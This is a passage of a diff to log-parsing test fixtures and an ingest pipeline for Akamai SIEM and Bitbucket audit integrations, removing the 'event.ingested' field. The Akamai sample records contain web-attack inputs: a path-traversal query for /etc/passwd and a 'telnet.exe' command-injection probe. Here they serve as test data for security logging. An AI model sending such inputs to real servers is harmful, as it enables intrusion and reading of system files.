"2021-12-23T23:43:19.592965333Z", "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"14227\",\"policyId\":\"qik1_26545\",\"ruleActions\":\"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d\",\"ruleData\":\"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX \",\"ruleMessages\":\"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 \",\"ruleSelectors\":\"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b\",\"ruleTags\":\"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R \",\"ruleVersions\":\"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d\",\"rules\":\"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ\"},\"geo\":{\"asn\":\"14618\",\"city\":\"ASHBURN\",\"continent\":\"288\",\"country\":\"US\",\"regionCode\":\"VA\"},\"httpMessage\":{\"bytes\":\"266\",\"host\":\"www.hmapi.com\",\"method\":\"GET\",\"path\":\"/\",\"port\":\"80\",\"protocol\":\"HTTP/1.1\",\"query\":\"option=com_jce%20telnet.exe\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"1158db1758e37bfe67b7c09\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150\",\"start\":\"1491303422\",\"status\":\"200\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", "id": "1158db1758e37bfe67b7c09", "category": "network", @@ -319,7 +318,6 @@ }, "event": { "start": "2016-08-11T13:45:33.026Z", - "ingested": "2021-12-23T23:43:19.592973640Z", "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\": \"TLSv1.2\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", "id": "2ab418ac8515f33", "category": "network", diff --git a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml index 8ad2b9f08da..004f5fcf3f4 100644 --- a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml +++ b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing Akamai logs processors: -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index 2d3d373833d..1e5c176fedc 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -50,7 +50,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.userdeleted", - "ingested": "2021-12-24T00:37:18.867678106Z", "original": "{\"timestamp\":\"2021-11-27T17:38:58.087Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.userdeleted\",\"action\":\"User deleted\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"USER\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"test.user\"}]}", "type": [ "user", @@ -137,7 +136,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.userrenamed", - "ingested": "2021-12-24T00:37:18.867681776Z", "original": "{\"timestamp\":\"2021-11-27T17:38:53.360Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.userrenamed\",\"action\":\"Username changed\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"bitbucket.service.user.audit.attribute.user.name\",\"from\":\"test\",\"to\":\"test.user\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"oldUsername\\\":\\\"test\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"test.user\"}]}", "type": [ "user", @@ -213,7 +211,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:18.867682876Z", "original": "{\"timestamp\":\"2021-11-27T17:38:42.151Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercredentialupdated\",\"action\":\"User password changed\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"test\"}]}", "kind": "event", "action": "bitbucket.service.user.audit.action.usercredentialupdated", @@ -289,7 +286,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupdeleted", - "ingested": "2021-12-24T00:37:18.867683789Z", "original": "{\"timestamp\":\"2021-11-27T17:38:29.423Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupdeleted\",\"action\":\"User group deleted\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=asdf\",\"id\":\"asdf\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"asdf\"}]}", "type": [ "group", @@ -379,7 +375,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipdeleted", - "ingested": "2021-12-24T00:37:18.867684796Z", "original": "{\"timestamp\":\"2021-11-27T17:38:23.209Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipdeleted\",\"action\":\"User deleted from user group\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=asdf\",\"id\":\"asdf\"},{\"name\":\"test\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"name\":\"Parent group\",\"value\":\"asdf\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"entities\\\":\\\"test\\\",\\\"membership\\\":\\\"GROUP_USER\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"asdf\"}]}", "type": [ "group", @@ -473,7 +468,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:18.867685811Z", "original": "{\"timestamp\":\"2021-11-27T17:38:16.687Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"action\":\"User added to user group\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=asdf\",\"id\":\"asdf\"},{\"name\":\"test\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"name\":\"Parent group\",\"value\":\"asdf\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"entities\\\":[\\\"test\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"asdf\"}]}", "type": [ "group", @@ -551,7 +545,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupcreated", - "ingested": "2021-12-24T00:37:18.867686790Z", "original": "{\"timestamp\":\"2021-11-27T17:38:04.808Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupcreated\",\"action\":\"User group created\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=asdf\",\"id\":\"asdf\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"asdf\"}]}", "type": [ "group", @@ -641,7 +634,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:18.867687921Z", "original": "{\"timestamp\":\"2021-11-27T17:36:40.692Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"action\":\"User added to user group\"},\"affectedObjects\":[{\"name\":\"stash-users\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=stash-users\",\"id\":\"stash-users\"},{\"name\":\"test\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"name\":\"Parent group\",\"value\":\"stash-users\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"entities\\\":[\\\"test\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"stash-users\"}]}", "type": [ "group", @@ -719,7 +711,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.usercreated", - "ingested": "2021-12-24T00:37:18.867688854Z", "original": "{\"timestamp\":\"2021-11-27T17:36:40.674Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercreated\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"test\"}]}", "type": [ "user", @@ -799,7 +790,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867689840Z", "original": "{\"timestamp\":\"2021-11-27T17:36:19.269Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 66\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"66\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:18.849Z\"}]}", "type": "info", "kind": "event" @@ -869,7 +859,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867690735Z", "original": "{\"timestamp\":\"2021-11-27T17:36:18.873Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"67 - 166\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:29:18.850Z - 2021-11-27T17:36:18.370Z\"}]}", "type": "info", "kind": "event" @@ -925,7 +914,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867691785Z", "original": "{\"timestamp\":\"2021-11-27T17:36:18.370Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Retention\",\"i18nKey\":\"atlassian.audit.event.change.retention\",\"to\":\"3 Years\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -988,7 +976,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867692688Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.994Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"security : base\",\"to\":\"security : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1051,7 +1038,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867693817Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.994Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"permissions : base\",\"to\":\"permissions : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1114,7 +1100,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867694856Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.994Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"ecosystem : base\",\"to\":\"ecosystem : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1177,7 +1162,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867695858Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.994Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"local_config_and_administration : base\",\"to\":\"local_config_and_administration : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1240,7 +1224,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867696948Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.994Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"user_management : base\",\"to\":\"user_management : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1303,7 +1286,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867697899Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.993Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"end_user_activity : base\",\"to\":\"end_user_activity : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1366,7 +1348,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867698861Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.991Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"global_config_and_administration : base\",\"to\":\"global_config_and_administration : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1442,7 +1423,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867699767Z", "original": "{\"timestamp\":\"2021-11-27T17:35:46.331Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 56\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"56\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:12.363Z\"}]}", "type": "info", "kind": "event" @@ -1512,7 +1492,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867700690Z", "original": "{\"timestamp\":\"2021-11-27T17:35:45.810Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search 